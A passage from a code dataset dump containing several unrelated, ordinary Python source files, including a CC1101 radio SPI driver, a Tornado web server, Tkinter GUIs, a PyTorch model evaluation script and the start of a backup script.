Lista_delta\r\n\r\n#Lista_DSLAMs = crear_lista_DSLAMs(\"dslam\")\r\n#print(Lista_DSLAMs)\r\n","sub_path":"Tools/output_file.py","file_name":"output_file.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"46217581","text":"import logging\nimport multiprocessing as mp\nimport unittest\nfrom typing import Any, Dict, Generic, List, Mapping, TypeVar\n\nfrom .expector_protocol import ExpectorProtocol\n\nT = TypeVar('T')\n\n\nclass MPExpector(ExpectorProtocol, Generic[T]):\n\n def __init__(self,\n expectations: Mapping[T, int],\n testcase: unittest.TestCase\n ) -> None:\n manager = mp.Manager()\n self.expectations = expectations\n self.testcase = testcase\n self.log = logging.getLogger()\n self.times_called: Dict[str, int] = manager.dict()\n for key in expectations:\n self.times_called[str(key)] = 0\n\n def get_expectations(self) -> List[T]:\n return list(self.expectations.keys())\n\n def call(self, key: Any) -> None:\n val = self.times_called.get(str(key))\n if val is None:\n val = 0\n self.times_called[str(key)] = val + 1\n\n def assert_satisfied(self) -> None:\n '''Assert that all expectations have been satisfied\n '''\n for (key, expected_value) in self.expectations.items():\n if expected_value != self.times_called[str(key)]:\n self.dump()\n self.testcase.assertEqual(expected_value,\n self.times_called[str(key)],\n \"For \" + str(key))\n self.testcase.assertTrue(True)\n\n def check(self) -> bool:\n '''Check each expectation and shortcircuit if one is not satisfied.\n '''\n for (key, expected_value) in self.expectations.items():\n if expected_value != self.times_called[str(key)]:\n return False\n return True\n\n def dump(self) -> None:\n self.log.debug(self.times_called)\n\n def __enter__(self) -> \"MPExpector[T]\":\n return self\n","sub_path":"snr/utils/mp_expector.py","file_name":"mp_expector.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"36714531","text":"import RPi.GPIO as GPIO\nimport spidev\nfrom time import sleep\n\nclass TransmitReceive():\n def __init__(self):\n self.initVar()\n self.initSPI()\n self.initGDO()\n self.reset()\n self.initReg()\n self.write(self.PATABLE, self.PATABELVAL)\n \n def initVar(self):\n #CC1101 CONFIG REGSITER\n self.IOCFG2 = 0x00 # GDO2 output pin configuration\n self.IOCFG1 = 0x01 # GDO1 output pin configuration\n self.IOCFG0 = 0x02 # GDO0 output pin configuration\n self.FIFOTHR = 0x03 # RX FIFO and TX FIFO thresholds\n self.SYNC1 = 0x04 # Sync word, high INT8U\n self.SYNC0 = 0x05 # Sync word, low INT8U\n self.PKTLEN = 0x06 # Packet length\n self.PKTCTRL1 = 0x07 # Packet automation control\n self.PKTCTRL0 = 0x08 # Packet automation control\n self.ADDR = 0x09 # Device address\n self.CHANNR = 0x0A # Channel number\n self.FSCTRL1 = 0x0B # Frequency synthesizer control\n self.FSCTRL0 = 0x0C # Frequency synthesizer control\n self.FREQ2 = 0x0D # Frequency control word, high INT8U\n self.FREQ1 = 0x0E # Frequency control word, middle INT8U\n self.FREQ0 = 0x0F # Frequency control word, low INT8U\n self.MDMCFG4 = 0x10 # Modem configuration\n self.MDMCFG3 = 0x11 # Modem configuration\n self.MDMCFG2 = 0x12 # Modem configuration\n self.MDMCFG1 = 0x13 # Modem configuration\n self.MDMCFG0 = 0x14 # Modem configuration\n self.DEVIATN = 0x15 # Modem deviation setting\n self.MCSM2 = 0x16 # Main Radio Control State Machine configuration\n self.MCSM1 = 0x17 # Main Radio Control State Machine configuration\n self.MCSM0 = 0x18 # Main Radio Control State Machine configuration\n self.FOCCFG = 0x19 # Frequency Offset Compensation configuration\n self.BSCFG = 0x1A # Bit Synchronization configuration\n self.AGCCTRL2 = 0x1B # AGC control\n self.AGCCTRL1 = 0x1C # AGC control\n self.AGCCTRL0 = 0x1D # AGC control\n self.WOREVT1 = 0x1E # High INT8U Event 0 timeout\n self.WOREVT0 = 0x1F # Low INT8U Event 0 timeout\n self.WORCTRL = 0x20 # Wake On Radio control\n self.FREND1 = 0x21 # Front end RX configuration\n self.FREND0 = 0x22 # Front end TX configuration\n self.FSCAL3 = 0x23 # Frequency synthesizer calibration\n self.FSCAL2 = 0x24 # Frequency synthesizer calibration\n self.FSCAL1 = 0x25 # Frequency synthesizer calibration\n self.FSCAL0 = 0x26 # Frequency synthesizer calibration\n self.RCCTRL1 = 0x27 # RC oscillator configuration\n self.RCCTRL0 = 0x28 # RC oscillator configuration\n self.FSTEST = 0x29 # Frequency synthesizer calibrationa control\n self.PTEST = 0x2A # Production test\n self.AGCTEST = 0x2B # AGC test\n self.TEST2 = 0x2C # Various test settings\n self.TEST1 = 0x2D # Various test settings\n self.TEST0 = 0x2E # Various test settings\n \n #CC1101 STROBE COMMANDS\n self.SRES = 0x30 # Reset chip.\n self.SFSTXON = 0x31 # Enable and calibrate frequency synthesizer (if MCSM0.FS_AUTOCAL=1).\n # If in RX/TX: Go to a wait state where only the synthesizer is\n # running (for quick RX / TX turnaround).\n self.SXOFF = 0x32 # Turn off crystal oscillator.\n self.SCAL = 0x33 # Calibrate frequency synthesizer and turn it off\n # (enables quick start).\n self.SRX = 0x34 # Enable RX. Perform calibration first if coming from IDLE and\n # MCSM0.FS_AUTOCAL=1.\n self.STX = 0x35 # In IDLE state: Enable TX. Perform calibration first if\n # MCSM0.FS_AUTOCAL=1. If in RX state and CCA is enabled:\n # Only go to TX if channel is clear.\n self.SIDLE = 0x36 # Exit RX / TX, turn off frequency synthesizer and exit\n # Wake-On-Radio mode if applicable.\n self.SAFC = 0x37 # Perform AFC adjustment of the frequency synthesizer\n self.SWOR = 0x38 # Start automatic RX polling sequence (Wake-on-Radio)\n self.SPWD = 0x39 # Enter power down mode when CSn goes high.\n self.SFRX = 0x3A # Flush the RX FIFO buffer.\n self.SFTX = 0x3B # Flush the TX FIFO buffer.\n self.SWORRST = 0x3C # Reset real time clock.\n self.SNOP = 0x3D # No operation. May be used to pad strobe commands to two\n # INT8Us for simpler software.\n \n #CC1101 STATUS REGSITER\n self.PARTNUM = 0x30\n self.VERSION = 0x31\n self.FREQEST = 0x32\n self.LQI = 0x33\n self.RSSI = 0x34\n self.MARCSTATE = 0x35\n self.WORTIME1 = 0x36\n self.WORTIME0 = 0x37\n self.PKTSTATUS = 0x38\n self.VCO_VC_DAC = 0x39\n self.TXBYTES = 0x3A\n self.RXBYTES = 0x3B\n\n #CC1101 PATABLE,TXFIFO,RXFIFO\n self.PATABLE = 0x3E\n self.TXFIFO = 0x3F\n self.RXFIFO = 0x3F\n \n #bit constsants\n self.WRITE_BURST = 0x40 #write burst\n self.READ_SINGLE = 0x80 #read single\n self.READ_BURST = 0xC0 #read burst\n self.BYTES_IN_RXFIFO = 0x7F #byte number in RXfifo\n \n #pin settings\n self.GDO0 = 23\n self.GDO2 = 24\n \n #Patable\n self.PATABELVAL = [0xC0, 0xC0, 0xC0, 0xC0, 0xC0, 0xC0, 0xC0, 0xC0]\n \n def initSPI(self):\n self.spi = spidev.SpiDev()\n self.spi.open(0,0)\n self.spi.cshigh = False\n \n def initGDO(self):\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(self.GDO0, GPIO.IN)\n GPIO.setup(self.GDO2, GPIO.IN)\n \n def reset(self):\n self.write(self.SRES)\n \n def initReg(self):\n self.write(self.FSCTRL1, 0x08)\n self.write(self.FSCTRL0, 0x00)\n self.write(self.FREQ2, 0x10)\n self.write(self.FREQ1, 0xA7)\n self.write(self.FREQ0, 0x62)\n self.write(self.MDMCFG4, 0x5B)\n self.write(self.MDMCFG3, 0xF8)\n self.write(self.MDMCFG2, 0x03)\n self.write(self.MDMCFG1, 0x22)\n self.write(self.MDMCFG0, 0xF8)\n self.write(self.CHANNR, 0x00)\n self.write(self.DEVIATN, 0x47)\n self.write(self.FREND1, 0xB6)\n self.write(self.FREND0, 0x10)\n self.write(self.MCSM0 , 0x18)\n self.write(self.FOCCFG, 0x1D)\n self.write(self.BSCFG, 0x1C)\n self.write(self.AGCCTRL2, 0xC7)\n self.write(self.AGCCTRL1, 0x00)\n self.write(self.AGCCTRL0, 0xB2)\n self.write(self.FSCAL3, 0xEA)\n self.write(self.FSCAL2, 0x2A)\n self.write(self.FSCAL1, 0x00)\n self.write(self.FSCAL0, 0x11)\n self.write(self.FSTEST, 0x59)\n self.write(self.TEST2, 0x81)\n self.write(self.TEST1, 0x35)\n self.write(self.TEST0, 0x09)\n self.write(self.IOCFG2, 0x0B) #serial clock.synchronous to the data in synchronous serial mode\n self.write(self.IOCFG0, 0x06) #asserts when sync word has been sent/received, and de-asserts at the end of the packet \n self.write(self.PKTCTRL1, 0x04) #two status bytes will be appended to the payload of the packet,including RSSI LQI and CRC OK\n #No address check\n self.write(self.PKTCTRL0, 0x05) #whitening offCRC Enable variable length packets, packet length configured by the first byte after sync word\n self.write(self.ADDR, 0x00) #address used for packet filtration.\n self.write(self.PKTLEN, 0x3D) #61 bytes max length\n \n def sendData(self, data):\n #data must be a list\n self.write(self.TXFIFO, len(data))\n data.append(len(data))\n self.write(self.TXFIFO, data)\n self.write(self.STX)\n while self.read(self.PKTSTATUS) & 0x01 == 0:\n pass\n while self.read(self.PKTSTATUS) & 0x01 == 1:\n pass\n self.write(self.SFTX)\n \n def write(self, addr, val=None): \n if val:\n data = [addr | self.WRITE_BURST]\n if isinstance(val, int):\n val = [val]\n elif not isinstance(val, list):\n raise TypeError(\"Value must be List or Integer\")\n data.extend(val)\n else:\n data = [addr]\n \n self.spi.writebytes(data)\n \n def read(self, addr, num=1):\n if num == 1: \n data = [addr | self.READ_SINGLE]\n else:\n data = [addr | self.READ_BURST]\n \n data.extend([0] * num)\n \n if num ==1:\n return self.spi.xfer2(data)[1]\n else:\n return self.spi.xfer2(data)[1:]\n","sub_path":"transmitReceive.py","file_name":"transmitReceive.py","file_ext":"py","file_size_in_byte":9442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"626265340","text":"# -*- coding: utf-8 -*-\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\nimport random\nimport math\nimport os\nimport os.path\nimport data\nimport re\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\nfrom tornado.options import define, options\ndefine(\"port\", default=8000, help=\"run on the given port\", type=int)\n\n\nclass ErrorHandler(tornado.web.RequestHandler):\n '''handler for error page'''\n def get(self):\n self.write_error(404)\n\n def write_error(self, status_code, **kwargs):\n if status_code == 404:\n self.render('404.html')\n else:\n self.write('error:' + str(status_code))\n\n\nclass BookPartHandler(tornado.web.RequestHandler):\n def get(self, name):\n book = data.getbook(name)\n self.render('book-part.html', book=book, back_url='/book')\n\n\nclass BookHandler(tornado.web.RequestHandler):\n def get(self):\n all_img = data.getimages('book', 'books')\n book_img = all_img[:4]\n key = ['url', 'img', 'alt']\n books = []\n for x in range(4):\n books.append(dict(zip(key, ['/book/book'+str(x), book_img[x], str(x)])))\n self.render('book.html', books=books, back_url='/')\n\n\nclass SomaHandler(tornado.web.RequestHandler):\n def get(self):\n all_img = data.getimages('funnycat', 'funnycats')\n col = row = 2\n funnycats = []\n for x in range(col):\n funnycat = []\n for y in range(row):\n funnycat.append(all_img[random.randrange(0, 16)])\n funnycats.append(funnycat)\n bodyareas = data.getbodyareas()\n self.render('soma.html', funnycats=funnycats, bodyareas=bodyareas, back_url='/')\n\n\nclass SomaPartHandler(tornado.web.RequestHandler):\n def get(self, name):\n key = ['funnycat', 'title', 'details']\n val = []\n all_img = data.getimages('funnycat', 'funnycats')\n val.append(all_img[random.randrange(0, 16)])\n all_img = data.getimages('text-'+name, 'body')\n if len(all_img) < 1:\n self.redirect('/error')\n val.append(all_img[0])\n all_img = data.getimages('body-'+name, 'body')\n val.append(all_img)\n soma_part = dict(zip(key, val))\n self.render('soma-part.html', soma_part=soma_part, back_url='/soma')\n\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n #hotcats = data.gethotcats()\n self.render('index.html')\n\n\n\nif __name__ == \"__main__\":\n tornado.options.parse_command_line()\n settings = {\n \"debug\": True,\n \"template_path\": os.path.join(os.path.dirname(__file__), \"template\"),\n \"static_path\": os.path.join(os.path.dirname(__file__), \"static\")\n }\n app = tornado.web.Application(\n handlers=[\n (r\"/\", IndexHandler), (r\"/soma\", SomaHandler),\n (r\"/soma/(\\w+)\", SomaPartHandler), (r'/book', BookHandler),\n (r\"/book/(\\w+)\", BookPartHandler), (r'.*', ErrorHandler)],\n **settings\n )\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"392623966","text":"import Tkinter\nimport media\nfrom PIL import ImageTk\n\n# Normally, this function would be in another module; that's how your project\n# should be structured.\ndef halve_red(pic):\n '''Cut the red values in half for every pixel in pic.'''\n \n for p in pic:\n p.set_red(p.get_red() / 2)\n\n\n# Image manipulation wrapper functions. Create one for each effect that you\n# implement.\n\ndef halve_red_wrapper(label):\n '''Halve the red values of the pixels in label's picture and update the\n GUI.'''\n\n halve_red(label.picture)\n update_label(label)\n\n\n# Utility functions. Use these to change the picture being displayed.\n\ndef update_label(label):\n '''Update Label label to re-display its picture. This needs to be called\n any time label's image is changed.'''\n \n photo = ImageTk.PhotoImage(label.picture.get_image())\n label.config(image=photo)\n label.config(width=photo.width())\n label.config(height=photo.height())\n\n # Keep a reference to the PhotoImage to avoid garbage collection.\n label.image = photo\n\n\ndef open_pic(label):\n '''Prompt for a Picture file, load that picture, and display it in Label\n label.'''\n \n # Keep a reference to the picture so it can be modified.\n label.picture = media.load_picture(media.choose_file())\n update_label(label)\n\n\nif __name__ == \"__main__\":\n # Here is an example of placing an image in a label and manipulating it.\n \n window = Tkinter.Toplevel()\n frame = Tkinter.Frame(window)\n frame.pack()\n\n # Add a label to display the picture \n label = Tkinter.Label(frame, width=10, height=10)\n label.pack()\n\n change_pic_cmd = lambda : open_pic(label) \n open_button = Tkinter.Button(frame, text='Open Picture',\n command=change_pic_cmd)\n open_button.pack()\n\n halve_red_cmd = lambda : halve_red_wrapper(label)\n red_btn = Tkinter.Button(frame, text='Halve Red',\n command=halve_red_cmd)\n red_btn.pack()\n \n window.mainloop()\n","sub_path":"ImageProcessing/label_image.py","file_name":"label_image.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"341214057","text":"import requests\n\nfrom platforms.platform import Platform\n\n\nclass Walking(Platform):\n original_data = None\n\n def __init__(self, amap):\n super().__init__(amap)\n\n def format(self, details=False):\n return [{\n 'way': self.__class__.__name__,\n 'number': 1,\n 'duration': int(self.original_data['route']['paths'][0]['duration']),\n 'distance': int(self.original_data['route']['paths'][0]['distance']),\n 'walking_distance': int(self.original_data['route']['paths'][0]['distance']),\n 'cost': 0,\n 'steps': self.original_data['route']['paths'][0]['steps'] if details is True else [],\n 'extra': '',\n }]\n\n def request_original_data(self):\n url = self.amap.domain + '/v3/direction/walking?parameters'\n params = {\n 'key': self.amap.key,\n 'origin': self.amap.origin,\n 'destination': self.amap.destination,\n # 'sig': '',\n 'output': 'JSON',\n }\n response = requests.get(url, params=params)\n return response.json()\n\n @staticmethod\n def get_polyline_from_steps(steps):\n points = []\n [points.extend(step['polyline'].split(';')) for step in steps]\n return {'walking': [[float(point.split(',')[0]), float(point.split(',')[1])] for point in points]}\n\n\n","sub_path":"platforms/walking.py","file_name":"walking.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"109164285","text":"from PIL import Image\n\ndef energy(pxls,x,y):\n\te = 0\n\ttry:\n\t\te = ((pow(abs((pxls[(x-1),y][0]) - (pxls[(x+1),y][0])),2)) + (pow(abs((pxls[(x-1),y][1]) - (pxls[(x+1),y][1])),2)) + (pow(abs((pxls[(x-1),y][2]) - (pxls[(x+1),y][2])),2))) + ((pow(abs((pxls[x,(y+1)][0]) - (pxls[x,(y-1)][0])),2)) + (pow(abs((pxls[x,(y+1)][1]) - (pxls[x,(y-1)][1])),2)) + (pow(abs((pxls[x,(y+1)][2]) - (pxls[x,(y-1)][2])),2)))\n\texcept Exception:\n\t\tpass\n\treturn e\n\ndef getImage(filename):\n\timg = Image.open(filename)\n\treturn img\n\ndef getPixels(img):\n\tpxls = img.load()\n\treturn pxls\n\ndef saveEnergy(width,height,pxls):\n\twhole = []\n\trow = []\n\tfor x in range(width):\n\t\tfor y in range(height):\n\t\t\ten = energy(pxls,x,y)\n\t\t\trow.append(en)\n\t\t\tif(y == (height - 1)):\n\t\t\t\twhole.append(row)\n\t\t\t\trow = []\n\treturn whole\n\ndef main():\n\tprint(\"Starting Program...\")\n\timg = getImage(\"images/lake.jpg\")\n\tpxls = getPixels(img)\n\twidth, height = img.size\n\teMap = saveEnergy(width,height,pxls)\n\tprint(eMap)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"46703245","text":"#!/usr/bin/python\nfrom math import sqrt as sroot\nfrom fractions import Fraction\nfrom random import randint\nimport tkinter\nclass calc(tkinter.Tk):\n def __init__(self,parent):\n tkinter.Tk.__init__(self,parent)\n self.parent = parent\n self.initialize()\n\n def initialize(self):\n self.grid()\n self.a = tkinter.Entry(self)\n self.b = tkinter.Entry(self)\n self.c = tkinter.Entry(self)\n self.a.grid(columnspan=1, column=0, row=0)\n self.b.grid(columnspan=1, column=1, row=0)\n self.c.grid(columnspan=1, column=2, row=0)\n self.a.bind(\"\", self.dothis)\n self.b.bind(\"\", self.dothis)\n self.c.bind(\"\", self.dothis)\n self.x1 = tkinter.StringVar()\n self.x2 = tkinter.StringVar()\n self.maxmin = tkinter.StringVar()\n self.maxmin_lab = tkinter.StringVar()\n x1_label = tkinter.Label(self, textvariable=self.x1, anchor=\"w\")\n x2_label = tkinter.Label(self, textvariable=self.x2, anchor='w')\n maxmin_label = tkinter.Label(self, textvariable=self.maxmin_lab, anchor='w')\n maxmincoord = tkinter.Label(self, textvariable=self.maxmin, anchor=\"w\")\n maxmin_label.grid(column=0, row = 3)\n maxmincoord.grid(column = 2, row=3)\n \n x1_label.grid(row=2, column=0)\n x2_label.grid(row=2, column=1)\n \n def f(self, x, a, b, c):\n return a*x**2+b*x+c\n\n def get_max_min(self, a, b, c):\n h = float((-1*b)/(2*a))\n k = self.f(h, a, b, c)\n if a < 0:\n self.maxmin_lab.set(\"Minimun\")\n else:\n self.maxmin_lab.set(\"Maximum\")\n self.maxmin.set(\"(\"+str(h)+\",\"+str(k)+\")\")\n\n\n def get_x_int(self, i, a, b, c):\n try:\n rooty = sroot(((b**2)-4*a*c))\n except:\n rooty = sroot(-1*((b**2)-4*a*c))\n root1 = (-b + rooty)/(2*a)\n root2 = (-b - rooty)/(2*a)\n if i == 1:\n return root1\n elif i == 0:\n return root2\n else:\n exit\n def dothis(self, event):\n a = float(self.a.get())\n b = float(self.b.get())\n c= float(self.c.get())\n xint = [str(Fraction((self.get_x_int(1, a, b, c)))), str(Fraction((self.get_x_int(0, a, b, c))))]\n self.x1.set(xint[0])\n self.x2.set(xint[1])\n self.get_max_min(a, b, c)\nif __name__ == \"__main__\":\n app = calc(None)\n app.title(\"calc\")\n app.mainloop()\n","sub_path":"quadgui.py","file_name":"quadgui.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"315336848","text":"from __future__ import print_function\nimport torch \nfrom torchvision import transforms\nimport argparse\nimport cv2 \nimport sys\nimport numpy as np \nimport matplotlib as mpl\nmpl.rcParams['figure.dpi']= 150\nfrom matplotlib import pyplot as plt\nfrom util import define_model\nfrom prepare_data import split_data\nfrom test import test_rg\n\nif __name__ == \"__main__\":\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n device_list = [device]\n\n parser = argparse.ArgumentParser(description=\"Parser for ros label prediction\")\n parser.add_argument('--phase', type=str, default='train', help='train, test, etc')\n parser.add_argument('--dict_files', nargs='+', help='list of files for testing')\n\n #data_related options\n parser.add_argument(\"--dataset_path\", type=str, help=\"path to the training dataset\")\n parser.add_argument('--preprocess', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop | crop | scale_width | scale_width_and_crop | none]')\n parser.add_argument(\"--phase_norm\", type=str, default ='min_max', help=\"normalization on the phase data [min_max| self_min_max]\")\n parser.add_argument(\"--ros_norm\", type=str, default ='None', help=\"normalization on the phase data [min_max| self_min_max]\")\n parser.add_argument(\"--std_transform\", type=bool, default =False, help=\"whether perform std mean norm on the phase data\")\n \n\n # training options \n # parser.add_argument(\"--epochs\", type=int, default=200, help=\"Number of training epochs\")\n parser.add_argument(\"--batch_size\", type=int, default=16, help=\"Batch size for training\")\n parser.add_argument(\"--checkpoint_model\", type=str, help=\" path to checkpoint model\")\n parser.add_argument('--resume_from', type=bool, required=False, help = \"whether retrain from a certain old model\")\n parser.add_argument('--old_dict', required='--resume_from' in sys.argv)\n parser.add_argument('--n_epochs', type=int, default=100, help='number of epochs with the initial learning rate')\n parser.add_argument('--n_epochs_decay', type=int, default=100, help='number of epochs to linearly decay learning rate to zero')\n parser.add_argument('--epoch_count', type=int, default=1, help='the starting epoch count, we save the model by , +, ...')\n parser.add_argument('--beta1', type=float, default=0.5, help='momentum term of adam')\n parser.add_argument(\"--lr\", type=float, default=1e-3, help=\"Learning rate\")\n parser.add_argument('--lr_policy', type=str, default='linear', help='learning rate policy. [linear | step | plateau | cosine]')\n parser.add_argument('--lr_decay_iters', type=int, default=50, help='multiply by a gamma every lr_decay_iters iterations')\n parser.add_argument('--loss', type=str, default='mse', help='loss function [mse | l1 | huber]')\n parser.add_argument('--delta', type=float, default=1, help='huber delta')\n\n # extraction model parameters\n parser.add_argument('--model_name', type=str, default='resnet34', help='chooses which model to use. [resnet18 | resnet34 | resnet50| resnet101 | resnet152]')\n parser.add_argument('--norm_type', type=str, default='batch', help='instance normalization or batch normalization [instance | batch | none]')\n\n # fc model parameters\n parser.add_argument('--fc_filters', type=int, default=512, help='# fc filters in the first layer')\n parser.add_argument('--fc_layers', type=int, default=3, help='# fc layers')\n parser.add_argument('--fc_norm_type', type=str, default='none', help='instance normalization or batch normalization [instance | batch | none]')\n parser.add_argument('--fc_drop_out', type = float, default = 0.2, help='dropout in the fc_layers')\n parser.add_argument('--fc_relu_slope', type = float, default = 0.01, help='relu slope in the fc_layers')\n\n #model init\n parser.add_argument('--init_type', type=str, default='normal', help='network initialization [normal | xavier | kaiming | orthogonal]')\n parser.add_argument('--init_gain', type=float, default=0.02, help='scaling factor for normal, xavier and orthogonal.')\n parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints')\n # Parse and return arguments\n opt = parser.parse_known_args()[0]\n print(len(opt.dict_files))\n fig, axs = plt.subplots(len(opt.dict_files), 3, figsize=(12, 3*len(opt.dict_files)))\n ax = axs.ravel()\n\n for i, dict_file in enumerate(opt.dict_files):\n if dict_file.find('resnet_18') != -1:\n print('resnet_18')\n opt = parser.parse_args(['--model_name', 'resnet18'])\n opt = parser.parse_args(['--fc_filters', '512'])\n opt = parser.parse_args(['--fc_layers', '3'])\n\n elif dict_file.find('resnet_34') != -1:\n print('resnet_34s')\n opt = parser.parse_args(['--model_name', 'resnet34'])\n opt = parser.parse_args(['--fc_filters', '512'])\n opt = parser.parse_args(['--fc_layers', '3'])\n\n elif dict_file.find('resnet_50') != -1:\n print('resnet_50')\n opt = parser.parse_args(['--model_name', 'resnet50'])\n opt = parser.parse_args(['--fc_filters', '2048'])\n opt = parser.parse_args(['--fc_layers', '2'])\n\n elif dict_file.find('resnet_101') != -1:\n opt = parser.parse_args(['--model_name', 'resnet101'])\n elif dict_file.find('resnet_152') != -1:\n opt = parser.parse_args(['--model_name', 'resnet152'])\n\n if dict_file.find('bs16') != -1:\n opt = parser.parse_args(['--batch_size', '16'])\n elif dict_file.find('bs128') != -1:\n opt = parser.parse_args(['--batch_size', '128'])\n elif dict_file.find('bs8') != -1:\n opt = parser.parse_args(['--batch_size', '8'])\n\n if dict_file.find('instance') != -1:\n opt = parser.parse_args(['--norm_type', 'instance'])\n else:\n opt = parser.parse_args(['--norm_type', 'batch'])\n\n # creat discinminator\n model = define_model(opt, device_list)\n model.load_state_dict(torch.load(dict_file + \".pt\"))\n\n img_trans = torch.nn.Sequential(\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomRotation(45, interpolation=transforms.InterpolationMode.NEAREST, expand=False, center=None, fill=0, resample=None),\n transforms.RandomVerticalFlip(p=0.5),)\n scripted_transforms = torch.jit.script(img_trans)\n\n if opt.std_transform == True:\n img_trans_i = torch.nn.Sequential( transforms.Normalize(mean=[0.5], std=[0.2]),\n )\n scripted_transforms_i = torch.jit.script(img_trans_i)\n else:\n scripted_transforms_i = None\n\n data_prepared = split_data('Data_mask_ponly_r7.npy', opt.batch_size, opt.phase_norm, opt.ros_norm, train_phase= opt.phase, trans=scripted_transforms, trans_i =scripted_transforms_i)\n data_prepared_1 = split_data('Data_mask_test_r7.npy', opt.batch_size, opt.phase_norm, opt.ros_norm, train_phase= 'test', trans=scripted_transforms, trans_i =scripted_transforms_i)\n test_loader = data_prepared['data_loader_test']\n train_loader = data_prepared['data_loader_train']\n test_loader_1 = data_prepared_1['data_loader_test']\n\n loader_list = [train_loader, test_loader, test_loader_1]\n for j in range(3): \n loss_te, loss_c, X_te, y_te, y_tep, class_label, condition_tag = test_rg(model, loader_list[j], opt)\n mae = np.mean(np.abs(y_te - y_tep))\n mape = np.mean(np.abs(y_te - y_tep)/y_te)\n ax[i*3+j].scatter(y_te, y_tep, s=0.1)\n ax[i*3+j].plot(np.linspace(0, 5, 30), np.linspace(0, 5, 30), c= \"red\", linestyle=':')\n ax[i*3+j].set_xlim([1, 3.5])\n ax[i*3+j].set_ylim([1, 3.5])\n # plt.title('Test-PMA')\n ax[i*3+j].set_xlabel('Ground truth', fontsize=14)\n #plt.ylim((0, 6000))\n ax[i*3+j].set_ylabel('Predition', fontsize=14)\n # plt.legend(handles = legend_vec)\n ax[i*3+j].grid(which='both', axis='y', alpha=0.4)\n ax[i*3+j].text(1.1, 2.8, 'MAE: %.4f\\nMAPE:%.2f%% \\nMSE: %.4f'%(mae, mape*100, loss_te), fontsize = 14)\n plt.show()","sub_path":"code/test_on_dict_list.py","file_name":"test_on_dict_list.py","file_ext":"py","file_size_in_byte":8332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523885737","text":"# -*- coding: utf-8 -*-\n\"\"\"Profile controller module\"\"\"\n\nfrom tg import predicates, require\nfrom tg import expose, redirect, validate, flash, url, request\n\nfrom tg.i18n import ugettext as _\nfrom tg.i18n import lazy_ugettext as l_\n\nfrom rocket.model import *\n\nfrom sqlalchemy import func, desc, asc\n\nfrom rocket.lib.tg_utils import *\nfrom rocket.lib.base import BaseController\n\nLIMIT = 20\n\nclass ProfileController(BaseController):\n\n def __init__(self, *args, **kwargs):\n pass\n\n @require(predicates.not_anonymous())\n @expose('rocket.templates.generic')\n def index(self, *args, **kwargs):\n html = self.get_active_profile_html(*args, **kwargs)\n javascript = self.get_javascript_profile_onload()\n title = _(\"My Profile\")\n return dict(title=title, html=html, javascript=javascript)\n\n @expose()\n def get_active_profile_html(self, *args, **kwargs):\n html = f\"\"\"\n
\n
\n
\n
\n
\n
\n

{_('My Profile')}

\n
\n
\n
\n
\n
\n
\n
\n
\n \"\"\"\n return html\n\n @expose()\n def get_javascript_profile_onload(self, *args, **kwargs):\n javascript = \"\"\"\n \"\"\"\n return javascript\n","sub_path":"rocket2_2/rocket/controllers/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"249324117","text":"import re\nfrom get_content import getContent\nfrom writer import writeImpl, writeInputFile\n\ndirName = '2016'\nyear = dirName\n\ndeclarationTemplate = getContent(\"v2/declare.txt\")\nimplementationTemplate = getContent(\"v2/source.txt\")\n\nfor i in range(21, 26):\n writeImpl(dirName, str(i), implementationTemplate, year)\n writeInputFile(dirName, str(i))\n print(declarationTemplate.replace(\"DAY\", str(i)).replace(\"YEAR\", year))\n","sub_path":"cpp/generator/twentyfive_append.py","file_name":"twentyfive_append.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"381297514","text":"#!/usr/bin/env python3\n\"this is a backup py\"\n\nimport time\nimport tarfile\nimport os\nimport hashlib\nimport pickle\n\n\ndef chmd5(file):\n m = hashlib.md5()\n with open(file, 'rb') as fobj:\n while True:\n data = fobj.read(4096)\n if not data:\n break\n m.update(data)\n return m.hexdigest()\n\ndef total_bak(src,dst,md5file):\n fname = '%s_full_%s.tar.gz'%(os.path.basename(src),time.strftime('%Y%m%d'))\n fname = os.path.join(dst,fname)\n\n t=tarfile.open(fname,'w:gz')\n t.add(src)\n t.close()\n\n fileList={}\n\n for path,folders,files in os.walk(src):\n for file in files:\n file=os.path.join(path,file)\n fileList[file]=chmd5(file)\n\n with open(md5file,'wb') as fobj:\n pickle.dump(fileList,fobj)\n\n\ndef incr_bak(src,dst,md5file):\n fname = '%s_incr_%s.tar.gz' % (os.path.basename(src), time.strftime('%Y%m%d'))\n fname = 